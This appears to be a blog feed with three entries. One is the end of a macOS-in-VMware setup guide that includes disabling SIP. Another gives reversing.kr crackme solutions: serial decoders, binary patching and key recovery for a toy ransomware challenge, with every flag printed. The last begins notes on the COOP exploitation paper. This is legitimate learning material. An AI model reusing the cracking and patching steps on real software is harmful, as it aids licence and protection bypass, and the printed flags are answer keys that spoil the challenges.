class="variable">$ZSH_CUSTOM</span>/plugins/zsh-syntax-highlighting</span><br></pre></td></tr></table></figure><p>Add <code>zsh-autosuggestions</code> and <code>zsh-syntax-highlighting</code> to the plugins field in <code>.zshrc</code>:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">plugins=(git autojump zsh-autosuggestions zsh-syntax-highlighting)</span><br></pre></td></tr></table></figure></li></ul><p>Once the plugins are installed, run <code>source ~/.zshrc</code> to reload the zsh configuration and enable them.</p></li><li><p>Install ShadowSocksR. Download: <a href="https://github.com/qinyuhang/ShadowsocksX-NG-R/releases">shadowsocksX-NG-R - github</a>; it supports subscription URLs.</p></li></ol><h2 id="四、扩容分区">4. Expanding the Partition</h2><p>If the macOS disk turns out to be too small and the virtual disk needs to grow, follow these steps:</p><ol><li><p>First, expand the disk in VMware</p></li><li><p>In macOS, run <code>diskutil list</code> to inspect the current disks:</p><p><img src="/2021/12/vmware_macos/image-20211213105925673.png" alt="image-20211213105925673"></p><p>Here disk0 is the whole disk and the disk0s2 partition is the space macOS currently uses, so disk0s2 is what we need to grow.</p></li><li><p>Try to expand the disk.</p><p>Most guides online use this command:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">diskutil resizeVolume disk0s2 50GB</span><br></pre></td></tr></table></figure><blockquote><p>Here disk0s2 is the disk to expand and 50GB is the target size.</p></blockquote><p>But because my disk0s2 is of type <code>Apple_APFS</code>, that command does not work.</p><p>Use the following command instead:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">diskutil apfs resizeContainer disk0s2 70GB</span><br></pre></td></tr></table></figure><p>The resize then starts:</p><p><img src="/2021/12/vmware_macos/image-20211213110427580.png" alt="image-20211213110427580"></p></li><li><p>The resize succeeded</p><p><img src="/2021/12/vmware_macos/image-20211213111727333.png" alt="image-20211213111727333"></p></li></ol><h2 id="五、关闭系统完整性保护">5. Disabling System Integrity Protection</h2><p>MacOS 
System Integrity Protection (<strong>SIP</strong>) restricts what even the root user can do, so it needs to be disabled.</p><blockquote><p>Ever had the joy of lldb being refused when attaching to another process as root?</p></blockquote><p>The easiest way is to disable it during the initial installation, as described above.</p><p>If you forgot to do so back then, disabling SIP now takes a bit more work.</p><ol><li><p>Point the virtual machine's CD/DVD drive at the original macOS installation image:</p><p><img src="/2021/12/vmware_macos/image-20211213130817589.png" alt="image-20211213130817589"></p></li></ol><p>Then enter the virtual machine's BIOS:</p><p><img src="/2021/12/vmware_macos/image-20211213131013230.png" alt="image-20211213131013230"></p><p>Choose the CD as the boot device:</p><p><img src="/2021/12/vmware_macos/image-20211213131148295.png" alt="image-20211213131148295"></p><p>Once the installer has booted, open <strong>Utilities -&gt; Terminal</strong>, run <code>csrutil disable</code>, and reboot the virtual machine; SIP is then disabled.</p><p><img src="/2021/12/vmware_macos/image-20211213113443227.png" alt="image-20211213113443227"></p>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;I. Introduction&lt;/h2&gt;
&lt;p&gt;This post records the pitfalls I ran into while setting up a macOS virtual machine in VMware Workstation on Win10.&lt;/p&gt;</summary>
    
    
    
    
    <category term="vmware" scheme="https://kiprey.github.io/tags/vmware/"/>
    
  </entry>
  
  <entry>
    <title>Reversing.kr Challenge Notes - 1</title>
    <link href="https://kiprey.github.io/2021/12/reversing_kr-1/"/>
    <id>https://kiprey.github.io/2021/12/reversing_kr-1/</id>
    <published>2021-12-11T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.074Z</updated>
    
    <content type="html"><![CDATA[<h2 id="0-简介">0. Introduction</h2><p>These are my notes from working through the reverse-engineering challenges on <a href="http://reversing.kr">reversing.kr</a>.</p><p>The challenges covered in this post are worth 100-120 points.</p><span id="more"></span><h2 id="1-Easy-Crack">1. Easy Crack</h2><p>Open the binary in 32-bit IDA and follow the cross-references from:</p><p><img src="/2021/12/reversing_kr-1/image-20211209225604780.png" alt="image-20211209225604780"></p><p>to</p><p><img src="/2021/12/reversing_kr-1/image-20211209225615397.png" alt="image-20211209225615397"></p><p>This leads straight to the target function and its key comparison:</p><p><img src="/2021/12/reversing_kr-1/image-20211209225657036.png" alt="image-20211209225657036"></p><p>From it the flag is easy to read off: <code>Ea5yR3versing</code></p><p><img src="/2021/12/reversing_kr-1/image-20211209230836059.png" alt="image-20211209230836059"></p><h2 id="2-Easy-Keygen">2. Easy Keygen</h2><p>The download is an archive whose ReadMe.txt says:</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Find the Name when the Serial is 5B134977135E7D13</span><br></pre></td></tr></table></figure><p>Running the program, the window prompts for a name:</p><p><img src="/2021/12/reversing_kr-1/image-20211209231245555.png" alt="image-20211209231245555"></p><p>So the task is to recover the Name from the given Serial.</p><p>Opening it in IDA reveals a simple mapping algorithm:</p><p><img src="/2021/12/reversing_kr-1/image-20211209231510613.png" alt="image-20211209231510613"></p><p>Based on that algorithm we can write a small decoder:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span 
class="line"><span class="meta">#<span class="keyword">define</span> _CRT_SECURE_NO_WARNINGS</span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;iostream&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> std;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    string serial = <span class="string">&quot;5B134977135E7D13&quot;</span>;</span><br><span class="line">    <span class="type">char</span> key[<span class="number">3</span>] = &#123; <span class="number">16</span>, <span class="number">32</span>, <span class="number">48</span> &#125;;</span><br><span class="line">    <span class="type">int</span> hex_val;</span><br><span class="line">    <span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt; serial.<span class="built_in">size</span>(); i += <span class="number">2</span>) &#123;</span><br><span class="line">        <span class="built_in">sscanf</span>(serial.<span class="built_in">substr</span>(i, <span class="number">2</span>).<span class="built_in">c_str</span>(), <span class="string">&quot;%x&quot;</span>, &amp;hex_val);</span><br><span class="line">        cout &lt;&lt; (<span class="type">char</span>)(hex_val ^ key[(i/<span class="number">2</span>) % <span class="number">3</span>]);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>This yields the flag: <code>K3yg3nm3</code></p><p><img src="/2021/12/reversing_kr-1/image-20211209233454523.png" alt="image-20211209233454523"></p><h2 
id="3-Easy-ELF">3. Easy_ELF</h2><p>Easy indeed. The program reads a string and then runs the following checks on it:</p><p><img src="/2021/12/reversing_kr-1/image-20211209234452851.png" alt="image-20211209234452851"></p><p>Inverting those checks gives the flag: <code>L1NUX</code></p><h2 id="4-Easy-Unpack">4. Easy Unpack</h2><p>This looks like a program that has to be unpacked, and judging from IDA's output the packer is a plain compressor. Scroll to the very bottom of the disassembly listing of the main function; the target of the final jmp instruction is the OEP.</p><p>Before the jump:</p><p><img src="/2021/12/reversing_kr-1/image-20211210001019055.png" alt="image-20211210001019055"></p><p>After the jump (this is the disassembly of the _start function):</p><p><img src="/2021/12/reversing_kr-1/image-20211210001149346.png" alt="image-20211210001149346"></p><p>So the OEP is <code>00401150</code>, which is also the flag to submit.</p><h2 id="5-ImagePrc">5. ImagePrc</h2><p>Start with the WinMain logic:</p><p><img src="/2021/12/reversing_kr-1/image-20211212115326564.png" alt="image-20211212115326564"></p><p>The event handler is easy to find, and cross-referencing the strings leads to the actual check:</p><p><img src="/2021/12/reversing_kr-1/image-20211212121036289.png" alt="image-20211212121036289"></p><p>The bitmap is <code>200 x 150</code>, and the check passes when all 90000 bytes match. <code>*v13</code> and <code>v13[v14]</code> presumably point at <strong>two different bitmaps</strong>; dumping them should reveal the answer.</p><blockquote><p>Total bitmap size: 200 x 150 pixels x 3 bytes per pixel = 90000 bytes, in RGB format.</p></blockquote><p>Nothing else stands out, so while debugging I first scribbled an A as a marker and then tried dumping the memory with IDA.</p><p>Dump script:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> idaapi</span><br><span class="line">start_address = <span class="number">0x2FA0048</span></span><br><span class="line">data_length = <span class="number">200</span>*<span class="number">150</span>*<span class="number">3</span></span><br><span class="line">data = idaapi.dbg_read_memory(start_address , data_length)</span><br><span class="line">fp = <span 
class="built_in">open</span>(<span class="string">&#x27;./dump.bin&#x27;</span>, <span class="string">&#x27;wb&#x27;</span>)</span><br><span class="line">fp.write(data)</span><br><span class="line">fp.close()</span><br></pre></td></tr></table></figure><p>Then process the dumped memory with Python:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#! python3</span></span><br><span class="line"><span class="comment"># `pip3 install pillow` to enable PIL</span></span><br><span class="line"><span class="keyword">from</span> PIL <span class="keyword">import</span> Image, ImageDraw</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"></span><br><span class="line">im = Image.new(<span class="string">&quot;RGB&quot;</span>, (<span class="number">200</span>, <span class="number">150</span>))</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;./dump.bin&quot;</span>, <span class="string">&quot;rb&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">150</span>):</span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> <span 
class="built_in">range</span>(<span class="number">200</span>):</span><br><span class="line">            r = <span class="built_in">int</span>.from_bytes(f.read(<span class="number">1</span>), <span class="string">&#x27;little&#x27;</span>)</span><br><span class="line">            g = <span class="built_in">int</span>.from_bytes(f.read(<span class="number">1</span>), <span class="string">&#x27;little&#x27;</span>)</span><br><span class="line">            b = <span class="built_in">int</span>.from_bytes(f.read(<span class="number">1</span>), <span class="string">&#x27;little&#x27;</span>)</span><br><span class="line">            im.putpixel((i, j), (r,g,b))</span><br><span class="line"></span><br><span class="line"><span class="comment"># im.save(&quot;dump.png&quot;)</span></span><br><span class="line">im.show()</span><br></pre></td></tr></table></figure><p>The image behind v13 looks like this:</p><p><img src="/2021/12/reversing_kr-1/image-20211212145026054.png" alt="image-20211212145026054"></p><p>Note that the dumped image comes out <strong>upside down</strong>.</p><p>Doing the same for <code>v13[v14]</code> gives:</p><p><img src="/2021/12/reversing_kr-1/image-20211212145155253.png" alt="image-20211212145155253"></p><p>So the flag is <code>GOT</code>.</p><h2 id="6-Ransomware">6. 
Ransomware</h2><p>Unpack the archive; according to the readme, the task is to decrypt the file named file.</p><p>Dropping the target binary into Exeinfo shows that it is packed with UPX:</p><p><img src="/2021/12/reversing_kr-1/image-20211212155306762.png" alt="image-20211212155306762"></p><p>So unpack it directly with an unpacker:</p><p><img src="/2021/12/reversing_kr-1/image-20211212155515369.png" alt="image-20211212155515369"></p><p>Then open it in IDA:</p><p><img src="/2021/12/reversing_kr-1/image-20211212155709684.png" alt="image-20211212155709684"></p><p>The main function turns out to contain a huge number of junk instructions, which keep IDA from decompiling it and make analysis harder, so we try to strip them out:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">data = <span class="literal">None</span></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;./run.exe&quot;</span>, <span class="string">&quot;rb&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    data = f.read()</span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">UPX0:0044A73D 60                                      pusha</span></span><br><span class="line"><span class="string">UPX0:0044A73E 61                                      popa</span></span><br><span class="line"><span class="string">UPX0:0044A73F 90                                      nop</span></span><br><span class="line"><span class="string">UPX0:0044A740 50                                      push    eax</span></span><br><span class="line"><span 
class="string">UPX0:0044A741 58                                      pop     eax</span></span><br><span class="line"><span class="string">UPX0:0044A742 53                                      push    ebx</span></span><br><span class="line"><span class="string">UPX0:0044A743 5B                                      pop     ebx</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line">new_data = data.replace(<span class="string">b&quot;\x60\x61\x90\x50\x58\x53\x5b&quot;</span>, <span class="string">b&quot;\x90&quot;</span> * <span class="number">7</span>)</span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;./run_dump_patch.exe&quot;</span>, <span class="string">&quot;wb&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    f.write(new_data)</span><br></pre></td></tr></table></figure><p>The body of <code>sub_401000</code> also consists entirely of these instructions, so that function is effectively empty. To avoid confusion, we rename <code>sub_401000</code> to <code>nop_func</code>.</p><p>Sadly, the main function is still too large to be decompiled.</p><p>With no other option left, we take the function prologue</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">UPX0:</span>004135E0 <span class="number">55</span>                                      <span class="keyword">push</span>    <span class="built_in">ebp</span></span><br><span class="line"><span class="symbol">UPX0:</span>004135E1 8B EC                                   <span class="keyword">mov</span>     <span class="built_in">ebp</span>, <span class="built_in">esp</span></span><br><span class="line"><span class="symbol">UPX0:</span>004135E3 <span class="number">83</span> EC <span class="number">24</span>                         
       <span class="keyword">sub</span>     <span class="built_in">esp</span>, <span class="number">24h</span></span><br><span class="line"><span class="symbol">UPX0:</span>004135E6 <span class="number">53</span>                                      <span class="keyword">push</span>    <span class="built_in">ebx</span></span><br><span class="line"><span class="symbol">UPX0:</span>004135E7 <span class="number">56</span>                                      <span class="keyword">push</span>    <span class="built_in">esi</span></span><br><span class="line"><span class="symbol">UPX0:</span>004135E8 <span class="number">57</span>                                      <span class="keyword">push</span>    <span class="built_in">edi</span></span><br></pre></td></tr></table></figure><p>and move it to the end of the function:</p><p><img src="/2021/12/reversing_kr-1/image-20211212154417401.png" alt="image-20211212154417401"></p><p>Then adjust the function's start address:</p><p><img src="/2021/12/reversing_kr-1/image-20211212154503604.png" alt="image-20211212154503604"></p><p>After that the function decompiles as usual. Below is the simplified decompiled code.</p><blockquote><p>Note that the start address changed here is only the one used by <strong>IDA's static analysis</strong>. At run time, a call to main still jumps to the original address.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span 
class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> __cdecl <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> **argv, <span class="type">const</span> <span class="type">char</span> **envp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  [...]</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;Key : &quot;</span>);</span><br><span class="line">  <span class="built_in">scanf</span>(<span class="string">&quot;%s&quot;</span>, key);</span><br><span class="line">  v3 = <span class="built_in">strlen</span>(key);</span><br><span class="line">  v7 = <span class="number">0</span>;</span><br><span class="line">  Stream = <span class="built_in">fopen</span>(<span class="string">&quot;file&quot;</span>, <span class="string">&quot;rb&quot;</span>);</span><br><span class="line">  <span class="keyword">if</span> (!Stream)</span><br><span class="line">      ;<span class="comment">/* exit */</span></span><br><span class="line">  <span class="built_in">fseek</span>(Stream, <span class="number">0</span>, <span class="number">2</span>);</span><br><span class="line">  v6 = <span class="built_in">ftell</span>(Stream);    <span class="comment">// get the file length</span></span><br><span class="line">  <span class="built_in">rewind</span>(Stream);</span><br><span class="line">  <span class="keyword">while</span> (!<span class="built_in">feof</span>(Stream))  <span class="comment">// read the file data into buf</span></span><br><span class="line">  &#123;</span><br><span class="line">    buf[v7] = <span 
class="built_in">fgetc</span>(Stream);</span><br><span class="line">    ++v7;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt; v6; ++i ) <span class="comment">// encrypt</span></span><br><span class="line">  &#123;</span><br><span class="line">    buf[i] ^= key[i % v3];</span><br><span class="line">    buf[i] = ~buf[i];</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">fclose</span>(Stream);</span><br><span class="line">  v5 = <span class="built_in">fopen</span>(<span class="string">&quot;file&quot;</span>, <span class="string">&quot;wb&quot;</span>);</span><br><span class="line">  <span class="keyword">for</span> ( j = <span class="number">0</span>; j &lt; v6; ++j )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">fputc</span>(buf[j], v5);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">printf</span>(asc_44C<span class="number">1E8</span>);</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">getch</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The core is this encryption routine:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// v6 is the length of the file data</span></span><br><span class="line"><span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt; v6; ++i ) <span class="comment">// encrypt</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="comment">// v3 is the key length</span></span><br><span class="line">    buf[i] ^= key[i % v3];</span><br><span 
class="line">    buf[i] = ~buf[i];</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The readme.txt describes the task as <code>Decrypt File (EXE)</code>. In other words, the file named file is an encrypted exe.</p><p><strong>With known plaintext, known ciphertext and knowledge of the encryption algorithm</strong>, the key is easy to recover. Note that the comparison uses the <strong>first 30 bytes</strong> of two exe files (one unencrypted, one encrypted), on the assumption that the first 30 bytes, which are part of the DOS header, are the same across exe files.</p><p>The following program brute-forces the key byte by byte:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#include &lt;iostream&gt;</span></span><br><span class="line">using namespace std;</span><br><span class="line"></span><br><span class="line"><span class="built_in">int</span> main() &#123;</span><br><span class="line">    // hexdump -n <span class="number">30</span> run.exe.bak -e <span class="string">&#x27;30/1 &quot;\\x%x&quot;&#x27;</span></span><br><span class="line">    const char* origin_text = <span class="string">&quot;\x4d\x5a\x90\x0\x3\x0\x0\x0\x4\x0\x0\x0\xff\xff\x0\x0\xb8\x0\x0\x0\x0\x0\x0\x0\x40\x0\x0\x0\x0\x0&quot;</span>;</span><br><span class="line">    // hexdump -n <span class="number">30</span> file -e <span class="string">&#x27;30/1 &quot;\\x%x&quot;&#x27;</span></span><br><span class="line">    const char* cipher_text = <span 
class="string">&quot;\xde\xc0\x1b\x8c\x8c\x93\x9e\x86\x98\x97\x9a\x8c\x73\x6c\x9a\x8b\x34\x8f\x93\x9e\x86\x9c\x97\x9a\xcc\x8c\x93\x9a\x8b\x8c&quot;</span>;</span><br><span class="line">    <span class="keyword">for</span> (size_t i = <span class="number">0</span>; i &lt; strlen(cipher_text); i++) &#123;</span><br><span class="line">        <span class="built_in">int</span> key;</span><br><span class="line">        <span class="keyword">for</span> (key = <span class="number">0</span>; key &lt; <span class="number">255</span>; key++) &#123;</span><br><span class="line">            <span class="keyword">if</span> ((origin_text[i] ^ key) == (~cipher_text[i])) &#123;</span><br><span class="line">                cout &lt;&lt; (char)key;</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (key == <span class="number">0xff</span>)</span><br><span class="line">            abort();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The recovered key is <code>letsplaychess</code>:</p><p><img src="/2021/12/reversing_kr-1/image-20211212164923948.png" alt="image-20211212164923948"></p><p>Now decrypt the file named file with it:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span 
class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> _CRT_SECURE_NO_WARNINGS</span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;iostream&gt;</span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> std;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    FILE* cipher_file = <span class="built_in">fopen</span>(<span class="string">&quot;C:\\Users\\Kiprey\\Desktop\\rever\\ransomware\\file&quot;</span>, <span class="string">&quot;rb&quot;</span>);</span><br><span class="line">    FILE* output_file = <span class="built_in">fopen</span>(<span class="string">&quot;C:\\Users\\Kiprey\\Desktop\\rever\\ransomware\\flag.exe&quot;</span>, <span class="string">&quot;wb&quot;</span>);</span><br><span class="line">       </span><br><span class="line">    <span class="type">const</span> <span class="type">char</span>* key = <span class="string">&quot;letsplaychess&quot;</span>;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">fseek</span>(cipher_file, <span class="number">0</span>, SEEK_END);</span><br><span class="line">    <span class="type">size_t</span> cipher_len = <span class="built_in">ftell</span>(cipher_file);    <span class="comment">// get the file length</span></span><br><span class="line">    <span 
class="built_in">rewind</span>(cipher_file);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> (<span class="type">size_t</span> i = <span class="number">0</span>; i &lt; cipher_len; ++i) <span class="comment">// decrypt</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="type">unsigned</span> <span class="type">char</span> buf = <span class="built_in">fgetc</span>(cipher_file);</span><br><span class="line">        buf = ~buf;</span><br><span class="line">        buf ^= key[i % <span class="built_in">strlen</span>(key)];</span><br><span class="line">        <span class="built_in">fputc</span>(buf, output_file);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">fclose</span>(cipher_file);</span><br><span class="line">    <span class="built_in">fclose</span>(output_file);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>This produces a <code>flag.exe</code>. Let's run it:</p><p><img src="/2021/12/reversing_kr-1/image-20211212165915247.png" alt="image-20211212165915247"></p><p>Argh. After copying a few missing DLLs over from elsewhere, it finally runs:</p><p><img src="/2021/12/reversing_kr-1/image-20211212170048738.png" alt="image-20211212170048738"></p><p>The flag is <code>Colle System</code>.</p><h2 id="7-CSHOP">7. 
CSHOP</h2><p>Once opened, the program offers nothing to interact with. IDA shows that it is a <code>.NET</code> program, so open it directly in dnSpy x86 (dnSpy's UI really is pretty, it has to be said):</p><p><img src="/2021/12/reversing_kr-1/image-20211212173934346.png" alt="image-20211212173934346"></p><p>A quick read of the code shows that the window has 10 Labels and 1 Button. When the Button is pressed, the 10 labels display their text (presumably the flag). The catch is that the <strong>Button's size is (0,0)</strong>, so under normal circumstances it cannot be clicked.</p><p>We can, however, try patching this IL:</p><p><img src="/2021/12/reversing_kr-1/image-20211212174305594.png" alt="image-20211212174305594"></p><p>Make these two values larger, then choose <code>File -&gt; Save Module</code>:</p><p><img src="/2021/12/reversing_kr-1/image-20211212174327671.png" alt="image-20211212174327671"></p><p>Reopen the patched program and click the button, and the flag appears:</p><p><img src="/2021/12/reversing_kr-1/image-20211212175001051.png" alt="image-20211212175001051"></p><p>The flag is <code>P4W6RP6SES</code>.</p>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;0-简介&quot;&gt;0. Introduction&lt;/h2&gt;
&lt;p&gt;These are my notes from working through the reverse-engineering challenges on &lt;a href=&quot;http://reversing.kr&quot;&gt;reversing.kr&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The challenges covered in this post are worth 100-120 points.&lt;/p&gt;</summary>
    
    
    
    
    <category term="reverse" scheme="https://kiprey.github.io/tags/reverse/"/>
    
  </entry>
  
  <entry>
    <title>Paper Notes: "Counterfeit Object-oriented Programming"</title>
    <link href="https://kiprey.github.io/2021/12/coop/"/>
    <id>https://kiprey.github.io/2021/12/coop/</id>
    <published>2021-12-01T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.900Z</updated>
    
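    <content type="html"><![CDATA[<h2 id="一、简介">I. Introduction</h2><p>ROP (return-oriented programming) has become a very popular exploitation technique, and there are now various ways to protect programs against ROP attacks, such as shadow stacks. This 2015 paper presents a new exploitation technique called <strong>Counterfeit Object-oriented Programming (COOP)</strong>, which mounts an attack using nothing but chains of virtual functions and call sites that already exist in the program. The attack is <strong>Turing complete</strong>: it can perform arbitrary computation, including conditional branches.</p><p>COOP can also bypass defenses that <strong>do not precisely take C++ object-oriented semantics into account</strong>. Such defenses are not tailored to any particular language (such as C++), so they naturally cannot stop COOP.</p><p>The attack builds on a few properties of C++ virtual functions:</p><ul><li><p>The C++ compiler implements <strong>vcalls (virtual function calls)</strong> through the <strong>vtable (virtual function table)</strong>.</p><blockquote><p>A vtable is an array of pointers to all of a class's virtual functions, including inherited ones.</p><p>Judging from reverse-engineering results, vtables usually live in the .rodata section.</p></blockquote></li><li><p>For a class with virtual functions, the start of each object's memory (offset 0) holds a pointer to the vtable.</p></li></ul><span id="more"></span><h2 id="二、面向伪对象的编程">II. Counterfeit Object-oriented Programming</h2><h3 id="1-目标">1. Goals</h3><p>Conventional code-reuse attacks such as ROP exhibit one or more of the following characteristics:</p><ul><li><p>C-1: indirect calls or jumps to <strong>non-address-taken</strong> locations.</p><blockquote><p>My understanding is that non-address-taken locations are code locations that are <strong>never reached through a function pointer</strong>, such as the various gadgets.</p><p>Virtual functions, by contrast, are address-taken.</p></blockquote></li><li><p>C-2: returns that do not match the call stack</p></li><li><p>C-3: excessive use of indirect branches</p></li><li><p>C-4: hijacking of the stack pointer</p></li><li><p>C-5: injection of new code or manipulation of existing code</p></li></ul><p>Because conventional attacks exhibit these characteristics, they can be detected by low-level, language-agnostic protections.</p><p>COOP therefore sets itself the following goals:</p><ul><li>G-1: do not expose characteristics C-1 through C-5</li><li>G-2: exhibit control flow and data flow <strong>similar to those of benign C++ code execution</strong></li><li>G-3: be widely applicable to C++ applications</li><li>G-4: achieve Turing completeness</li></ul><h3 id="2-敌手模型">2. Adversary Model</h3><p>To mount a COOP attack, the attacker must</p><ul><li>be able to hijack a <strong>C++ object that uses a vptr</strong> (that is, an object with virtual functions) and either infer that object's base address or control a sufficiently large buffer;</li><li>be able to infer the base addresses of a set of C++ modules and know their binary layout.</li></ul><h3 id="3-基本攻击方法">3. 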
